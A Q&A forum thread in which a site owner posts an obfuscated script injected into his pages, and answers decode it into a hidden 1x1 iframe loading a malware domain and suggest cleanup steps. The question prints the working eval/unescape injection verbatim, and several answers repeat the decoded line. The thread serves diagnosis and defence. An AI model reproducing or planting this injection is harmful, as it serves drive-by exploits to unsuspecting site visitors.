This site may be distributing malware ? strange javascript?

Question

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%
70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33%
37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%
3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>

My website www.safwanmanpower.com is attacked by a malware script in each page i don't know wt this script is all about can anybody how this script make my website malware affected ??

hoping for quick and positive response.

edited

how sumone can attacked my website without an permission of uploading ??

Answer 1

the unescaped code is something like this:

document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')

Evaluating it will add an 1px by 1px iframe to your site, which points to the above address.

Answer 2

Your site has been compromised by a known entity. Your page is now serving exploits to your visitors and is putting them at risk.

Take your site down now and refer to: http://safeweb.norton.com/report/show?name=sedpoo.com

Threat Report
Total threats found: 4

Drive-By Downloads (what's this?)
Threats found: 3
Here is a complete list: (for more information about a specific threat, click
 on the Threat Name below)
Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?687328


Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?-560137484


Threat Name:     HTTP Malicious Toolkit Variant Activity 15
Location:    http://sedpoo.com/?2443640

Viruses (what's this?)
Threats found: 1
Here is a complete list: (for more information about a specific threat, click
 on the Threat Name below)
Threat Name:    Trojan.Gen
Location:    http://sedpoo.com/des.jar

And: http://www.google.co.uk/safebrowsing/diagnostic?site=sedpoo.com/

What is the current listing status for sedpoo.com?
Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?
Of the 1887 pages we tested on the site over the past 90 days, 0 page(s)
 resulted in malicious software being downloaded and installed without user 
consent. The last time Google visited this site was on 2011-01-18, and the 
last time suspicious content was found on this site was on 2011-01-18.
Malicious software includes 2478 exploit(s), 2135 trojan(s), 1508 scripting 
exploit(s).

This site was hosted on 8 network(s) including AS4766 (Korea Telecom), 
AS51306 (UAIP), AS5610 (CZECH).

Has this site acted as an intermediary resulting in further distribution 
of malware?
Over the past 90 days, sedpoo.com appeared to function as an intermediary 
for the infection of 962 site(s) including feja-islame.com/, yaris-club.net/, 
cstbilisi.ge/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It 
infected 2519 domain(s), including yaris-club.net/, feja-islame.com/, 
bhiee.net/.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, 
which would cause us to show the warning message.

I would not visit the sedpoo attack site until you have further researched the threat and are ready to deal with the potential infections that may ensue. Spinning up a virtual machine to visit the site is a quick way to further investigate without putting your workstation and data in harms way.

Answer 3

You should use the smscanner ( Simple Server Malware Scanner ) which will scan for infected files, scripts , obfuscated javascript codes, shells etc. etc. It works so far on linux web servers

More @ https://sourceforge.net/projects/smscanner/

Answer 4

on chrome, that unescapes to "document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')", which chrome tells me is a site that hosts malware.

Answer 5

When removing the whitespace it decodes to:

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

Answer 6

If you want to see what that code does, paste the escaped code on this URL (I've done it, and it appears to be trying to redirect your site to another link): http://www.linkedresources.com/tools/unescaper_v0.2b1.html

Are you using some kind of Content Management System (CMS) on your website? If so, the best thing you can do is to go to that CMS's website and download the latest version.

Answer 7

The unescaped code is:

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

Which is creating an iFrame to http://sedpoo.com/?338375 which I assume will generate pop-ups for advertising etc

Answer 8

Unescaped the code using the tool here to get this

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')

Which is embedding a 1px x 1px(effectively invisible) iframe into your page, from here its most likely attacking your visitors with exploits or simply trying to spawn advert windows

Answer 9

I will answer the direct question: injecting script to every page means the hacker got control over the web server, maybe over the whole host web farm.

How? Maybe he stole admin password. Maybe he worked at the host and use back door he planted. You can't really know and if you're hosted you can't really protect yourself as it's the host responsibility.

If you're hosted, find other and more reliable host. Otherwise do as Cfreak commented and change all the passwords on the server, install new and powerful Firewall etc etc...

Edit: in case the server is yours (i.e. you don't use 3rd party host) check the Security event log and see who logged in during the time of the infection. Obviously, run full virus/malware scan.

Answer 10

Here is the deobfuscated JavaScript code:

document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')